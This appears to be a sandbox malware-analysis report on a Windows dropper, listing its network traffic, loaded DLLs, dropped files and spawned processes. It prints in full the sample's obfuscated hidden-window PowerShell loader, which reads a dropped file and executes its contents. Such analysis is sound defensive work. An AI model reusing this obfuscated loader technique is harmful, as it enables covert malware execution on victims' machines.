0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349609914.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B6D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383990393.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230463189.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304464046.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1756685959.0000000000B66000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349609914.0000000000B68000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B6C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.4:49720 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49721 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49729 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49731 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.4:49734 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49735 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49737 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 216.58.206.78:443 -> 192.168.2.4:49740 version: TLS 1.2
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeCode function: 0_2_00405339 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405339

      System Summary

      barindex
      Powershell drops PE file
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\GyGE2VaBFL.exeJump to dropped file
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeCode function: 0_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403325
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeFile created: C:\Windows\resources\0809\Dkvingernes88Jump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeFile created: C:\Windows\resources\0809\Dkvingernes88\malagaJump to behavior
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
      Source: GyGE2VaBFL.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal100.troj.evad.winEXE@7/27@2/3
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeCode function: 0_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403325
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeCode function: 0_2_004045EA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004045EA
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeFile created: C:\Users\user\AppData\Local\afsindigstesJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7728:120:WilError_03
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeFile created: C:\Users\user\AppData\Local\Temp\nst2C19.tmpJump to behavior
      Source: GyGE2VaBFL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: GyGE2VaBFL.exeVirustotal: Detection: 63%
      Source: GyGE2VaBFL.exeReversingLabs: Detection: 47%
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeFile read: C:\Users\user\Desktop\GyGE2VaBFL.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\GyGE2VaBFL.exe "C:\Users\user\Desktop\GyGE2VaBFL.exe"
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Appassionataens178=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Ricinoleic.Eks';$Desquamative=$Appassionataens178.SubString(52965,3);.$Desquamative($Appassionataens178) "
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Appassionataens178=Get-Content -Raw 'C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Ricinoleic.Eks';$Desquamative=$Appassionataens178.SubString(52965,3);.$Desquamative($Appassionataens178) "Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
